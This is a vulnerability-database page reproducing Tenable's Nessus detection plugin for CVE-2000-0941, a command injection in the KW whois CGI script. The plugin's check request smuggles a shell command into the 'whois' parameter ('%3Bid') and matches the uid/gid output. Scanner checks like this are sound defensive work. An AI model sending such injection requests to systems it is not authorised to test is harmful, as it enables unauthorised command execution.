Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2000-2021 Tenable Network Security, Inc.KW_WHOIS.NASL
HistoryNov 29, 2002 - 12:00 a.m.

KW Whois CGI whois Parameter Arbitrary Command Execution

2002-11-2900:00:00
This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.
www.tenable.com
56
JSON

The version of the KW whois CGI script installed on the remote web server fails to filter input to the β€˜whois’ parameter of shell metacharacters. An unauthenticated, remote attacker can leverage this issue to execute arbitrary commands with the privileges of the http daemon.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if(description)
{
 script_id(10541);
 script_version("1.29");

 script_cve_id("CVE-2000-0941");
 script_bugtraq_id(1883);

 script_name(english:"KW Whois CGI whois Parameter Arbitrary Command Execution");
 script_summary(english:"Checks for the presence of /cgi-bin/whois.cgi");

 script_set_attribute(
  attribute:"synopsis",
  value:
"The remote web server hosts a CGI script that allows execution of
arbitrary commands."
 );
 script_set_attribute(
  attribute:"description", 
  value:
"The version of the KW whois CGI script installed on the remote web
server fails to filter input to the 'whois' parameter of shell
metacharacters.  An unauthenticated, remote attacker can leverage this
issue to execute arbitrary commands with the privileges of the http
daemon."
 );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://seclists.org/bugtraq/2000/Oct/426"
 );
 script_set_attribute(
  attribute:"solution", 
  value:"Unknown at this time."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(
  attribute:"vuln_publication_date", 
  value:"2000/10/29"
 );
 script_set_attribute(
  attribute:"plugin_publication_date", 
  value:"2002/11/29"
 );
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

http_check_remote_code (
			check_request:"/whois.cgi?action=load&whois=%3Bid",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id"
			);

Related

cve 1
cve
cve
CVE-2000-0941
2000-12-19 05:00:00
JSON
Related for KW_WHOIS.NASL
cve1